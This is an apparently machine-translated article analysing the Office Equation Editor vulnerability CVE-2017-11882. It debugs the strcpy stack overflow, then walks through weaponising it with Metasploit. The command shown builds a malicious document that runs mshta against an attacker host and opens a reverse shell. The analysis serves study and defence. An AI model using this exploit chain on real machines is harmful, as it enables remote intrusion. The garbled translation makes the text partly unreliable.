Shulou(Shulou.com)05/31 Report--

How to carry out CVE-2017-11882 analysis, I believe that many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Preface

In fact, when it comes to office fishing, there must be CVE-2017-11882. I encountered this loophole when I analyzed the samples of APT organization Manlinghua last year, and I have not studied and studied this loophole in depth. Now I have some time to analyze and learn, because this loophole is a sharp weapon when many well-known APT organizations such as Manglinghua, White Elephant, Maha Grass, rattlesnake and so on launch attacks. And the study of this vulnerability does not need protection mechanisms such as by pass DEP and ASLR, and it is not complicated to exploit the vulnerability.

Introduction of loopholes

CVE-2017-11882 is a remote code execution vulnerability published by Microsoft. The vulnerability is caused by the module EQNEDT32.EXE formula editor, which is installed by default during the installation of Office. The module embeds the formula in the Office document with OLE technology (Object Linking and Embedding, object linking and embedding). The cause of the vulnerability is that the formula editor EQNEDT32.EXE (path C:\ Program Files\ Common Files\ microsoft shared\ EQUATION) reads OLE data containing MathType without checking the name length when copying the formula font name, which allows attackers to overwrite the function return address on the stack through deliberately constructed data content, resulting in stack buffer overflow, hijacking the program execution process and executing their own malicious code. Also because when inserting and editing mathematical formulas, EQNEDT32.EXE is not created as a child of the Office process, but exists as a separate process. Therefore, the protection mechanism of the Office process cannot protect the EQNEDT32.EXE process from being exploited. From the point of view of the exploit effect, it can kill all versions of Office 2003 to 2016.

Vulnerability analysis environment and tools

Win7 x64

Office 2003

IDA

OllyDbg

MSF

Vulnerability analysis installation office

I use Office 2003 (full installation is required). After we have installed it completely, we can use the following figure to see if it is all installed. Menu-"insert -" object-see if there is Microsoft Formula 3.0. if it is not specified that the installation is not the full version.

Office 2003 full link: https://pan.baidu.com/s/1O7BsRE4YQQLvWOWYikGz6Q extraction code: g0dh

View vulnerability files

We can follow the path below to find the program that created the vulnerability, and the exeinfo information shows that the program is written in VC++.

POC authentication vulnerability

Once the environment is set up, we can use POC to simply verify the vulnerability. When we open exploit.rtf, we can find that the calculator pops up without any prompt, indicating that there are vulnerabilities in successful verification.

Flick calculator vulnerability POC: https://github.com/Ridter/CVE-2017-11882

Detailed analysis

Because the calculator pops up when we open POC, it means that a new process has been created, and we can guess that it is WinExec or CreateProcess to create the API of the new process. In this way, we can use OD to attach EQNEDT32.EXE, and then go down the API breakpoint for dynamic debugging.

Let's first open EQNEDT32.EXE and then use OD to attach this process.

Then we issue the API breakpoint, command: BP WinExec, and then open the POC file, the program is successfully broken, and the content displayed in the stack shows that our breakpoint is correct.

In the stack in the figure above, we can see that the return address of WinExec is 00430C18, the parameter is 0018F354, and the content of the parameter is to open the calculator through the cmd command.

At this time, the 00430C12 is the user mode address, according to reason, the ebp should store the return address of the current function, but it shows 41414141. It is obvious that the ebp has been destroyed. Because the stack has been destroyed by the malicious shellcode constructed at this time, let's go up the stack to see where the ebp is destroyed.

Found a recent return address 00411837, we enter to flip up, set a breakpoint at the beginning of the function, rerun, let the program break in this function.

Program cut off

When we step through F8, we find such an instruction at 00411658: rep movsd dword ptr es: [edi], dword ptr [esi] after the instruction is executed, the ebp is overwritten by 41414141, and the function of the instruction is to transmit the value of esi to the location referred to by edi.

Let's take a look at the contents of esi and edi before executing the previous command:

ESI:

EDI:

Rep movsd dword ptr es: [edi], dword ptr [esi] after execution, EDI is successfully assigned. You can see that the value of ebp has changed from 0018F214 to 41414141, and the return address after EBP has been changed from 004115d8 to 00430c12.

The address of 00430C12

After the WinExec function is executed, the CreateProcess function is called inside the WinExec function. At the break point, you can see the parameters of the function, that is, the pop-up calculator for calling cmd

We already know through dynamic debugging that the location of the vulnerability is at 00411658, and we will use static analysis next. We use IDA to open the EQNEDT32.EXE and jump to the 00411658 address

In order to analyze our F5 to view the following pseudocode, oh, students who have learned the C language should understand at a glance that we use the unsafe version of the strcpy function without judging and limiting the length of the parameters, resulting in a stack overflow.

POC content details

At this point, a rough analysis of the vulnerability has been completed.

Exploit vulnerabilities with MSF

Python script download link: https://github.com/Ridter/CVE-2017-11882

Msf component download: https://github.com/0x09AL/CVE-2017-11882-metasploit

Copy the cve_2017_11882.rb file downloaded above to the / usr/share/metasploit-framework/modules/exploits/windows/smb/ directory

Put the downloaded cve_2017_11882.rtf to / usr/share/metasploit-framework/data/exploits/

Reload the module.

Use the command search cve_2017_11882 to find the corresponding module, and then use exploit/windows/smb/cve_2017_11882 to set payload to bounce tcp, set various parameters, lhost to the IP of kali, and use the command set URIPATH test to set the path of URI (note the path test set here, which should also be added when using python script to generate doc)

Run, exploit-j

Open another terminal, copy Command109b_CVE-2017-11882.py to the kai liunx desktop, cd to the desktop, and run the command python Command109b_CVE-2017-11882.py-c "mshta http://192.168.62.129:8080/test"-o test2.doc to generate malicious doc files.

Copy the file to the target machine and open it

Return to the attack plane kai liunx and see that the attacked machine is online.

Then we can carry on our traditional craftsmanship.

After reading the above, have you mastered the method of how to carry out CVE-2017-11882 analysis? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.